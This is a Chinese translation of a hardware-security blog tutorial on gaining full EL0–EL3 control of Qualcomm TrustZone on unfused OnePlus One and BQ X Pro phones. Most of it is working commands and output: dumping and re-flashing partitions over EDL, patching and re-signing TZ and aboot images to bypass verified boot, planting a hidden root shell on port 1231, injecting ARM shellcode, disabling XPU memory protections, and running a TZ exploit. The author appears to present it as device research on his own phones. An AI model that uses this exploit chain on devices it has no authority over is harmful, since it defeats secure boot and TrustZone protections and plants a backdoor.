原文标题:Bring Light To The Darkness P3
原文地址:https://bkerler.github.io/2020/08/03/bring-light-to-the-darkness-p3/
本文是一篇翻译文章,翻译不对的地方还请指正。
打造一个可调试高通Trustzone(Aarch64架构)的环境
简介
- 用一个没有被破坏安全启动的手机,设置Trustzone调试环境,并开启破解之旅
- 同样适用于最终用户设备和开发板,最终我们会有完整的EL0-EL3级别的控制
- 未破坏(安全启动的,应该是指没有解锁的),使用MSM8974、MSM8976、MSM8953、MSM8937等芯片,以及使用基于高通X6、X8或者X9调制解调器的手机,我这里使用的是BQ X Pro和Oneplus One
- 已安装python 3.x环境(Linux)
1. 验证设备是否容易遭受冷补丁攻击
1.1 安装最新版adb和fastboot
~ $ mkdir ~/bin
~ $ cd ~/bin
~/bin $ wget https://dl.google.com/android/repository/platform-tools-latest-linux.zip; unzip platform-tools-latest-linux.zip; rm platform-tools-latest-linux.zip
~/bin $ cd ..在配置环境变量并重启电脑后,adb应当可用
1.2 安装我提供的高通紧急下载工具
~ $ git clone https://github.com/bkerler/EDL edl
~ $ cd edl
~/edl $ python3 -m pip install pyusb pyserial
~/edl $ sudo 'echo "blacklist qcserial" >> /etc/modprobe.d/blacklist.conf'
~/edl $ sudo cp Drivers/51-edl.rules /etc/udev/rules.d
~/edl $ sudo cp Drivers/50-android.rules /etc/udev/rules.d
~/edl $ sudo udevadm control -R1.3 从固件中提取(?)与你的设备匹配的EDL Loader并将其放入Loaders目录,并将它以[msmid]_[pkhash 8 bytes].bin这样的形式命名,或者直接使用fhloaderparse.py脚本
其实就是去 https://github.com/bkerler/EDL 下面的Loaders目录,找到匹配手机的bin文件,复制到Loaders中
例如直接复制BQ X Pro的Loader
~/edl $ cp 000460E100000000_cc3153a80293939b_FHPRG_bqXPro.bin Loaders例如直接复制Oneplus One的Loader
~/edl $ cp 007BC0E100000000_cc3153a80293939b_FHPRG_OnePlusOne.bin Loadersfhloaderparse脚本使用示例
~/edl $ mkdir test
~/edl $ cp emmc_prog_firehose.bin test
~/edl $ ./fhloaderparse.py test1.4 将手机关机,然后同时按下音量+和音量-,再连接USB,这个时候手机就会进入9008模式了(当然国内很多没法直接进,最快的方法是拆机短接)
1.5 使用高通固件冷补丁验证设备是否容易受到攻击
~/edl $ ./edl.py -secureboot
Qualcomm Sahara / Firehose Client (c) B.Kerler 2018-2019.
__main__ - Trying with loaders in Loader directory ...
__main__ - Waiting for the device
__main__ - Device detected :)
__main__ - Mode detected: sahara
Device is in EDL mode .. continuing.
Library.sahara -
------------------------
HWID: 0x007bc0e100000000 (MSM_ID:0x007bc0e1,OEM_ID:0x0000,MODEL_ID:0x0000)
PK_HASH: 0xcc3153a80293939b90d02d3bf8b23e0292e452fef662c74998421adad42a380f
Serial: 0x0d7e015b
SBL Version: 0x00000000
Library.sahara - Unfused device detected, so any loader should be fine...
Library.sahara - Trying loader: Loaders/qualcomm/007BC0E100000000_cc3153a80293939b_FHPRG_OnePlusOne.bin
Successfully uploaded programmer :)
Library.firehose - TargetName=MSM8974
Library.firehose - MemoryName=eMMC
Library.firehose - Version=1
Library.firehose - Peek: Address(0xfc4b83f8),Size(0x4)
Progress: |██████████████████████████████████████████████████| 100.0% Complete
Sec_Boot0 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Sec_Boot1 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Sec_Boot2 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Sec_Boot3 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Secure boot disabled.如果最后显示的是Secure boot disabled,那就说明可以打补丁并进行破解
2. 获取设备固件
2.1 直接从设备上转储(dump)
将boot、aboot和tz分区进行转储(dump)(补充,这是在9008模式下操作)
~/edl $ ./edl.py -r boot boot.img
Qualcomm Sahara / Firehose Client (c) B.Kerler 2018-2019.
__main__ - Trying with loaders in Loader directory ...
__main__ - Waiting for the device
__main__ - Device detected :)
__main__ - Mode detected: firehose
Library.firehose - TargetName=MSM8974
Library.firehose - MemoryName=eMMC
Library.firehose - Version=1
Library.firehose -
Reading from physical partition 0, sector 196608, sectors 32768
Progress: |██████████████████████████████████████████████████| 100.0% Complete
Dumped sector 196608 with sector count 32768 as boot.img.如果显示main - USB desync, please rerun command !,那就重新再执行一下命令
~/edl $ ./edl.py -r aboot aboot.img
~/edl $ ./edl.py -r tz tz.img然后退回edl的上一级目录
~/edl $ cd ..另外一种方案是直接下载官方的固件(工厂镜像?),然后进行攻击
例如 64 Bit BQ Aquaris X Pro MSM8953的2.7.2_20190620-1410-bardockpro_bq-user-2169-Fastboot-FW.zip,地址如下(已失效)
https://storage.googleapis.com/otas/2017/Smartphones/Bardock_Pro/OTA_Official/Oreo/2.7.2/2.7.2_20190620-1410-bardockpro_bq-user-2169-Fastboot-FW.zip32 Bit Oneplus One MSM8974的cm-13.1.2-ZNH2KAS3P0-bacon-signed-fastboot.zip,地址如下(未失效)
https://www.androidfilehost.com/?fid=245910004249601093. 下载我的高通攻击工具并安装之
3.1 从github下载最新版
~ $ git clone https://github.com/bkerler/qcpatchtools
~ $ cd qcpatchtools3.2 安装capstone,keystone组合引擎(工具)
~/qcpatchtools $ git clone https://github.com/keystone-engine/keystone --recursive
~/qcpatchtools $ cd keystone && mkdir -p build && cd build && cmake ..
~/qcpatchtools/keystone $ ../make-lib.sh
~/qcpatchtools/keystone $ sudo make install
~/qcpatchtools/keystone $ cd bindings/python
~/qcpatchtools/keystone/bindings/python $ sudo python3 setup.py build install
~/qcpatchtools/keystone/bindings/python $ cd ~/qcpatchtools
~/qcpatchtools $ rm -rf keystone~/qcpatchtools $ git clone https://github.com/aquynh/capstone --recursive
~/qcpatchtools $ cd capstone
~/qcpatchtools/capstone $ ./make.sh
~/qcpatchtools/capstone $ sudo ./make.sh install
~/qcpatchtools/capstone $ cd bindings/python
~/qcpatchtools/capstone/bindings/python $ sudo python3 setup.py build install
~/qcpatchtools/capstone/bindings/python $ cd ~/qcpatchtools
~/qcpatchtools $ rm -rf capstone3.3 安装必要的三方包
~/qcpatchtools $ sudo pip3 install -r requirements.txt3.4 然后可以退出qcpatchtools文件夹了
~/qcpatchtools $ cd ~4. 修改(基础)内核
以64 Bit BQ Aquaris X Pro MSM8953为例
4.1 下载和手机相匹配的内核源代码,编译之
~ $ git clone https://github.com/bq/aquaris-X-Pro.git
~ $ mv aquaris-X-Pro kernel
~ $ cd kernel
~/kernel $ git checkout tags/2.5.1_20190114-1551
~/kernel $ cd ..
~ $ git clone https://android.googlesource.com/platform/prebuilts/gcc/linux-x86/aarch64/aarch64-linux-android-4.9
~ $ cd aarch64-linux-android-4.9
~/aarch64-linux-android-4.9 $ git checkout 22f053ccdfd0d73aafcceff3419a5fe3c01e878b
~/aarch64-linux-android-4.9 $ cd ..
~ $ mkdir KERNEL_OUT4.2 下载我添加了自定义svc处理的补丁(参考Gal Beniamini’s的博客),同时去掉了xpu限制,添加了额外的tz svc(调用)的日志记录(指通过下面的命令对编译好的内核打补丁)
~ $ patch -p1 -d kernel < qcpatchtools/patches/kernel_bq_msm8953.diff4.3 编译自定义内核
~ $ make -C kernel O=../KERNEL_OUT ARCH=arm64 CROSS_COMPILE=../aarch64-linux-android-4.9 bardockpro_defconfig
~ $ make -j4 O=../KERNEL_OUT/ -C kernel ARCH=arm64 CROSS_COMPILE=../aarch64-linux-android-4.9/bin/aarch64-linux-android-
~ $ cp KERNEL_OUT/arch/arm64/boot/Image.gz-dtb zkernel以32 Bit Oneplus One MSM8974为例(具体步骤和上面基本一致,除了运行的命令稍微不一样)
4.1 编译官方内核
~ $ git clone https://github.com/LineageOS/android_kernel_oneplus_msm8974 -b cm-13.0 kernel
~ $ git clone https://android.googlesource.com/platform/prebuilts/gcc/linux-x86/arm/arm-linux-androideabi-4.9
~ $ cd arm-linux-androideabi-4.9
~/arm-linux-androideabi-4.9 $ git checkout 10ddded24ecdbdeaa4ac57d49962ca06e9c1ceaa
~/arm-linux-androideabi-4.9 $ cd ..
~ $ mkdir KERNEL_OUT4.2 用我的工具对内核打补丁
~ $ patch -p1 -d kernel < qcpatchtools/patches/kernel_oneplus_msm8974.diff4.3 编译自定义内核
~ $ make -C kernel O=../KERNEL_OUT ARCH=arm CROSS_COMPILE=../arm-linux-androideabi-4.9 cyanogenmod_bacon_defconfig
~ $ make -j4 O=../KERNEL_OUT/ -C kernel ARCH=arm CROSS_COMPILE=../arm-linux-androideabi-4.9/bin/arm-linux-androideabi-
~ $ cp KERNEL_OUT/arch/arm/boot/zImage zkernel这里没有复制zImage-dtb,是因为OnePlus不一样,它使用修改过的dtb,不过已经从boot镜像中提取了
5. 将(基础)内核进行root
为了有自己的有root(权限)的内核,(我)使用我的Android_Universal工具和EDL脚本,在一个有锁的零售版BQ X Pro手机上,通过adb开启了tz的调试(模式),然后添加了一个自定义的逆向Shell
5.1 安装android_universal工具集
~ $ git clone https://github.com/bkerler/android_universal5.2 对存储分区进行root,然后添加一个假的root用来过AVBv1验证(Root of Trust)
~ $ cd edl
~/edl $ cp boot.img ../android_universal
~/edl $ cd ~/android_universal对于32 Bit Oneplus One MSM8974
Oneplus One使用谷歌的test loaders签名,所以可以直接刷入boot.img.signed文件
~/android_universal $ ./makeramdisk.sh -fn boot.img -c -fs 1对于64 Bit BQ Aquaris X Pro MSM8953
由于MSM8953系列的设备使用的是Android Verified Boot v1(AVBv1),那么需要刷入boot.img.rotfake
~/android_universal $ ./makeramdisk.sh -fn boot.img -c5.3 makeramdisk会临时停止(等待其他动作,即给boot镜像添加自定义文件),新开一个终端,执行下面的命令
~/android_universal $ cp ../zkernel tmp/kernel
~/android_universal $ cd ..然后回到makeramdisk这个终端,回车,然后就会打包并签名boot镜像了
6. 为了注入代码,先准备tz的shellcode(冷补丁或者热补丁)
6.1 把合适的shellcode保存到shellcode.txt中
对于32 Bit Oneplus One MSM8974
# R0 = writeflag (0=read, 0x22=write), R1=addr, R2=value, R3=readmemptr
PUSH {R4-R6,LR}
CMP R0, #0x22
BEQ write
LDR R0, [R1]
STR R0, [R3]
B exit
write:
STR R2, [R1]
exit:
POP {R4-R6,PC}对于64 Bit BQ Aquaris X Pro MSM8953
# X0 = writeflag (0=read, 0x22=write), R1=addr, R2=value
STP X28, X27, [SP,#-0x60]!
STP X26, X25, [SP,#0x10]
STP X24, X23, [SP,#0x20]
STP X22, X21, [SP,#0x30]
STP X20, X19, [SP,#0x40]
STP X29, X30, [SP,#0x50]
MOV X29, SP
# Value of arg0 0x22 means write dword from arg2 to address arg1,
# Value of arg0 0x0 means read dword from arg2
CMP W0, #0x22
BEQ write
LDR W0, [X1]
B exit
write:
STR W2, [X1]
exit:
LDP X29, X30, [SP,#0x50]
LDP X20, X19, [SP,#0x40]
LDP X22, X21, [SP,#0x30]
LDP X24, X23, [SP,#0x20]
LDP X26, X25, [SP,#0x10]
LDP X28, X27, [SP],#0x60
RET7. 用刚才的shellcode对tz打补丁,好让我们可以进行代码注入
7.1 把前面的shellcode补丁到tz的空白的地方(指临时存放shellcode至一处没有使用的空白区域)
对于32 Bit Oneplus One MSM8974
~/qcpatchtools $ ../tz_coldpatch32.py -in tz.mbn -out tz.patched -sc shellcode.txt
Found svc_entry_offset: 0xfe826104.
Possible code cave at 0xfe809c8d, file offset: 0x30b8c
svc code: 0x0C06 (svc 0x03 cmd 0x06)
Code to patch:70b5222802d00868106000e00a6070bd
Patching done, saved as tz.patched对于64 Bit BQ Aquaris X Pro MSM8953
~/qcpatchtools $ ./tz_coldpatch64.py -in ../edl/tz.img -out tz.img.patched -sc shellcode.txt
Found code cave at 0x8657871c, file offset: 0x5c71c, svc code: 0x0200020D
Code to patch:1f88007160000054200040b9c0035fd6220000b9c0035fd6
Patching done, saved as tz.img.patched7.2 使用自定义私钥对tz.bin进行签名
~/qcpatchtools $ ./qc_signer.py -t qsee -in tz.img.patched -out tz.signed8. 对aboot打补丁以使可以自定义ramdisk
这是有AVB验证的才需要,如果是OnePlus MSM8974那就不用管
8.1 对aboot打补丁
对于32 Bit Oneplus One MSM8974
- 不需要处理
对于64 Bit BQ Aquaris X Pro MSM8953
首先对aboot打补丁,用于过验证
~/qcpatchtools $ ./aboot_rot64.py -in ../edl/aboot.img -out aboot.patched然后对tz.bin签名
~/qcpatchtools $ ./qc_signer.py -in aboot.bin -out aboot.signed -t appsbl
~/qcpatchtools $ rm aboot.patched9. 刷入修改后的文件
对于32 Bit Oneplus One MSM8974
9.1 把boot和tz镜像复制到EDL文件夹
~/qcpatchtools $ cp tz.signed ../edl/ && cd ..
~/qcpatchtools $ cd ..
~ $ cp android_universal/boot.img.signed edl/9.2 关机,然后同时音量+和音量-进入9008模式(当然前面说了,国内的设备最好短接进入最方便),刷入boot和tz
~ $ cd edl/
~/edl $ ./edl.py -w boot boot.img.signed
~/edl $ ./python3 edl.py -w tz tz.signed9.3 重启手机
对于64 Bit BQ Aquaris X Pro MSM8953
9.1 同样的也是复制boot和tz到EDL文件夹
~/edl $ cd ~
~ $ cp qcpatchtools/aboot.signed qcpatchtools/tz.signed ../edl/
~ $ cp android_universal/boot.rotfake edl/
~ $ cd /edl9.2 刷入aboot、boot和tz
~/edl $ ./edl.py -w boot boot.rotfake
~/edl $ ./edl.py -w aboot aboot.signed
~/edl $ ./edl.py -w tz tz.signed
~/edl $ cd ..9.3 如果手机重启进入的是usb pid 0x900E或者0x9006模式,那么请拆机,抠下电池,断开usb连接,将emmc clk引脚接地,然后重新连接USB,取消接地,装上电池。然后这个时候就可以正常进入9008,然后可以愉快刷机了
9.4 重启手机
10. 测试设备(内核)是否成功root
10.1 如果TZ刷写失败
情况一:设备一直处于0x9006模式,救砖过程如下
首先执行下面的命令
~/edl $ ./edl.py -vid 0x05c6 -pid 0x9006这个时候设备会作为一个分区(被挂载?),为了救砖得刷一个正常的tz,那么得备份sbl1分区,然后擦除
~/edl $ dd if=/dev/disk/by-part-label/sbl1 of=sbl1.bin
~/edl $ dd if=/dev/zero of=/dev/disk/by-part-label/sbl1然后转到9008模式,写入正常的sbl1和tz镜像
~/edl $ ./edl.py -w sbl1 sbl1.img
~/edl $ ./edl.py -w tz tz.img复制自定义的adb key
~ $ cd ../android_universal
~/android_universal $ ./install_adb_key.sh情况二:设备一直处于0x900E模式
具体表现为,设备不启动而且亮红灯(呼吸灯?),说明镜像签名有问题,你需要在手机启动时把带有DAT0和GND引脚进行短接(不要接电池),然后进入9008模式,然后装上电池,使用edl重新刷固件
~/edl $ ./edl.py -w tz tz.img10.2 复制自定义adb key
~ $ cd ../android_universal
~/android_universal $ ./install_adb_key.sh- 为了得到有root的shell,需要先通过tcp连接上设备的1231端口,进入有隐藏root的shell,连接的时候不会有提示,输入命令回车执行即可
$ adb shell
bardock-pro:/ $ toybox nc 0.0.0.0 1231
root@bardock:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:su:s0
root@bardock:/ # uname -a
Linux localhost 3.18.71-perf-g18b9c9b33ae-dirty #1 SMP PREEMPT Tue Feb 26 14:18:30 CET 2019 aarch64
root@bardock:/ # getprop | grep 8.1
[net.tcp.buffersize.lte]: [2097152,4194304,8388608,262144,524288,1048576]
[net.tcp.buffersize.wifi]: [524288,2097152,4194304,262144,524288,1048576]
[ril.ecclist]: [911,112,*911,#911,000,08,110,999,118,119,122]
[ril.ecclist1]: [911,112,*911,#911,000,08,110,999,118,119]
[ro.bootimage.build.fingerprint]: [bq/bardock-pro/bardock-pro:8.1.0/OPM1.171019.026/1492:user/release-keys]
[ro.boottime.adbd]: [5047811195]
[ro.boottime.cnd]: [6851364840]
[ro.boottime.cnss-daemon]: [6891754944]
[ro.boottime.keystore]: [6871139580]
[ro.boottime.mediadrm]: [6872873851]
[ro.boottime.nfc_hal_service]: [4955175831]
[ro.boottime.nvtool]: [6861805830]
[ro.boottime.nxpnfc_hal_svc]: [4962930831]
[ro.boottime.ril-daemon]: [6887123642]
[ro.boottime.storaged]: [6882149788]
[ro.boottime.time_daemon]: [6853684111]
[ro.boottime.tombstoned]: [6930821819]
[ro.boottime.vndservicemanager]: [4090654841]
[ro.build.description]: [bardockpro_bq-user 8.1.0 OPM1.171019.026 1492 release-keys]
[ro.build.fingerprint]: [bq/bardock-pro/bardock-pro:8.1.0/OPM1.171019.026/1492:user/release-keys]
[ro.build.version.base_os]: [bq/bardock-pro/bardock-pro:8.1.0/OPM1.171019.026/1422:user/release-keys]
[ro.build.version.release]: [8.1.0]
[ro.com.google.gmsversion]: [8.1_201810]11. 和tz对话(读取tz内存)
对于32 Bit Oneplus One MSM8974
从tz内读取dword内存(地址 -> 0xFE82CDA0)示例
$ adb forward tcp:1231 tcp:1231
$ adb push qcxploit /data/local/tmp
$ nc localhost 1231
root@bacon:/ # cd /data/local/tmp
root@bacon:/data/local/tmp # ./qcxploit exploit8974
root@bacon:/data/local/tmp # ./qcxploit readmem 0xFE82CDA0 4
0xFE805738
385780FE对于64 Bit BQ Aquaris X Pro MSM8953
从tz内读取dword内存(地址 -> 0x8657871c)示例
$ adb forward tcp:1231 tcp:1231
$ adb push qcxploit /data/local/tmp
$ nc localhost 1231
root@bardock:/ # cd /data/local/tmp
root@bardock:/data/local/tmp # ./qcxploit readmem 8657871c 4
Sending SVC: 0x200020d
Data:
0xA9BA6FFC
FC6FBAA912. 如何对tz打补丁(指令写空白区)
对于32 Bit Oneplus One MSM8974
12.1 禁用XPU
root@bacon:/ # /data/local/tmp/qcxploit svcreg32 03 06 03 0x22 0xFC48B080 0x0
Sending SVC: 0x10, CMD: 0x2
IOCTL RES: 0x0000001E
root@bacon:/ # /data/local/tmp/qcxploit exploit8974
MSM8974 TZ 0-day exploit by B.Kerler 2017
----------------------------------------------------------
Disable NS Blacklist
Zeroing out IMEM
Refreshing NS Blacklist
Done exploiting12.2 读写
- 读dword
root@bacon:/ # /data/local/tmp/qcxploit svcreg32 03 06 03 0x0 0x[addr_to_read] 0x[bufferaddr]- 写dword
root@bacon:/ # /data/local/tmp/qcxploit svcreg32 03 06 03 0x22 0x[addr_to_write] 0x[value_to_write]- 禁用XPU后读
root@bacon:/ # /data/local/tmp/qcxploit readmem [addr_to_read] [length_to_read]- 禁用XPU后写
root@bacon:/ # /data/local/tmp/qcxploit writemem [addr_to_write] [value_to_write_as_hexstring]12.3 生成shellcode
~/qcpatchtools ~ Tools/asmtools.py -asm arm,thumb -in ShellCode/shellcode_examples/read_write_shellcode_arm.txt
CPU: arm, MODE: thumb
70b5222802d00868106000e00a6070bd12.4 注入shellcode(0xfe809c8d就是7.1.部分的偏移量)
root@bacon:/data/local/tmp # ./qcxploit writemem FE809C8D 70b5222802d00868106000e00a6070bd12.5 运行注入的shellcode
root@bacon:/data/local/tmp # ./qcxploit svcreg32 06 03 03 0 0xFE808796 0xFE82830c
Sending SVC: 0xc, CMD: 0xe
IOCTL RES: 0x0000003E
root@bacon:/data/local/tmp # ./qcxploit readmem 0xFE82830C 4
Memory read:
70B5042B12.6 执行出现异常,请查看/d/tzdbg/log
对于64 Bit BQ Aquaris X Pro MSM8953
12.1 禁用XPU
禁用HWIO_BIMC_S_DDR0_XPU_SCR_ADDR,可选,但会禁用tz key
root@bardock:/ # ./qcxploit svcreg 200020D 4 22 44a000 13f 0禁用HWIO_BIMC_S_DDR0_XPU_CR_ADDR
root@bardock:/ # ./qcxploit svcreg 200020D 4 22 44a080 19e 0禁用HWIO_OCIMEM_MPU_XPU_SCR_ADDR,可选,但会禁用tz key
root@bardock:/ # ./qcxploit svcreg 200020D 4 22 53000 13f 0禁用HWIO_OCIMEM_MPU_XPU_CR_ADDR
root@bardock:/ # ./qcxploit svcreg 200020D 4 22 53080 11f 0通过修改有保护的内存区域实现禁用写保护,并非指的是tz代码开始的区域(地址),而是指tz代码结束的区域(地址)(将0x866f0000写到HWIO_BIMC_S_DDR0_XPU_PRT2_START0_ADDR),这是tz的bug
root@bardock:/ # ./qcxploit svcreg 200020D 4 22 44a340 866f0000 012.2 开启tz的调试日志
root@bardock:/ # mount -t debugfs debugfs /d/
root@bardock:/ # ls /d/tzdbg12.3 现在可以用devmem把任何代码上传到tz了,这里以svc cmd 0x200030F写入tz为例
root@bardock:/ # ./busybox devmem 0x865ef918
root@bardock:/ # ./busybox devmem 0x865ef918 32 0x865630fc
root@bardock:/ # ./busybox devmem 0x865ef918 32 0x86572214
root@bardock:/ # ./busybox devmem 0x8657221C 32 0xD2800000
root@bardock:/ # ./qcxploit svcreg 200030F 4 0 53000 13e 0
好文!! 可惜看不懂。